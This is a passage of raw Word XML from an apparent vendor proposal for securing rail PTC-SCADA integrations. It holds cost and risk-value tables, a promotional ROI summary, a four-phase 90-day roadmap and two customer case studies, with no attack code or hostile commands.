              <w:t xml:space="preserve">Annual OpEx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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5-Year TCO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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">NCC OTCE Program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t xml:space="preserve">$1.2M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$200K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$2.0M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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dragos Platform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$1.8M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$540K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$3.96M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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Adelard Safety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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$650K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$195K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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$1.43M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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Implementation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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$450K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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$450K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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Training &amp; Drills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t xml:space="preserve">$280K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t xml:space="preserve">$84K</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$616K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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Total Investment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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$4.38M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$1.02M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$8.46M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000256">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_et6503gkkwke" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Mitigation Value</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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Current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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mitigated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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Value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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Catastrophic Incident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$800M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$80M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$720M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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Operational Disruption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$450M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$45M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$405M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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Regulatory Fines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$125M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$5M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$120M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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Reputation Damage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$275M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$30M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$245M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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Insurance Increases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$150M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$20M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$130M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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Total Risk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$1.8B</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$180M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$1.62B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000273">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yvvoxkyf8bqx" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5-Year Financial Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000274">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investment: $8.46M</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Risk Reduction: $1.62B</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Operational Savings: $34M (automation, efficiency)</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Insurance Premium Reduction: $45M (25% decrease)</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Compliance Cost Avoidance: $23M</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Grant Funding Secured: $12M</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Net Benefit: $1.725B</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ROI: 20,283%</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Payback Period: 3.2 months</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wqzt2c85h27c" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000288">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wbnhks38jiut" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">90-Day Security Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000289">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Gantt chart timeline on white background (#FFFFFF). Three parallel tracks for NCC/Dragos/Adelard activities. Timeline shows weeks 1-13 with key milestones. Color coding: Assessment (blue #0080FF), Quick wins (green #00FF94), Platform deployment (amber #FFB800), Optimization (purple #9D4EDD). Risk reduction percentage shown at each milestone: 15%, 40%, 70%, 94%. Include dependencies and critical path highlighted.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_20p5tw98k7eo" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Emergency Containment (Days 1-14)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate PTC from SCADA networks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy emergency monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inventory all integration points</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Reduction</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 15%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7thv494oxyl6" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Rapid Hardening (Days 15-30)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000290">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement protocol breaks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000291">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Dragos sensors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch critical systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000293">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Reduction</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 40%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000294">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5zx25arhhkq3" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Platform Deployment (Days 31-60)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000295">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Full Dragos rollout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000296">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced analytics enabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000297">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety validation completed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000298">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Reduction</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 70%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000299">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_80uwyejuf62t" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Operational Excellence (Days 61-90)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">24/7 monitoring active</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Playbooks operational</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Team fully trained</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Reduction</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 94%</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gh2zzbmda3uz" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Success Stories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mmoqohstsy6s" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Case Study 1: Major Freight Railroad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Integrated PTC-SCADA across 15,000 miles</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rPr/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Week 1-2: Emergency assessment found 347 critical paths</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Week 3-4: Rapid segmentation implemented</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Week 5-8: Dragos platform deployed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Week 9-12: Full operational capability</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Results</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero safety incidents during implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">94% risk reduction achieved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$340M liability exposure eliminated</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Federal recognition for leadership</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_unzbd96zucy9" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Case Study 2: Regional Transit Authority</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Situation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Legacy integration, dense urban environment</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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Approach</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phased implementation during maintenance windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B7">
      <w:pPr>
        <w:numPr>
